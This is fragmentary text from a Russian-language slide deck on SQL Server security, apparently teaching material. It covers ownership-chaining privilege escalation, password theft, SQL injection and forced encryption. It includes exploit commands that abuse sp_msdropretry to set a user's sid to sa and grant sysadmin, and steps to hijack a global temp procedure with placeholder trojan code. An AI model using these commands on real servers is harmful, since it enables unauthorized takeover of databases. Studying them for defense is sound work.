FindSlide.org - это сайт презентаций, докладов, шаблонов в формате PowerPoint.
Email: Нажмите что бы посмотреть
Использование цепочки владения для повышения
полномочий
Получение паролей пользователей
Внедрение SQL кода (SQL Injection)
2. Установить сертификат в локальное хранилище компьютера
3. Включить шифрование Force Protocol Encryption
4. Проверить соединение (ODBC):
Driver=SQLServer;Server=ServerName;
Network=DBNETLIB.DLL;Encrypt=YES
Используем ошибку в sp_msdropretry для замены sid (0x01=sa)
exec sp_msdropretry
‘xx update sysusers set sid=0x01 where name= ‘’dbo’’’, ‘xx’
Set xstatus field to 18 (sysadmin)
exec sp_msdropretry
‘xx update dbo.test set xstatus=18 where name= SUSER_SNAME()’, ‘xx’
exec sp_configure
«Cross DB Ownership Chaining», «1»
exec sp_dboption
«databasename», «db chaining», «true»
select name from
tempdb..sysobjects
where name like '##%'
1. Поиск процедуры:
2. Модификация:
alter proc ## 3. Ожидание выполнения привилегированным пользователем
<код трояна>
SQL Injection могут быть подвержены:
- WEB приложения
- Двухзвенные приложения
- Хранимые процедуры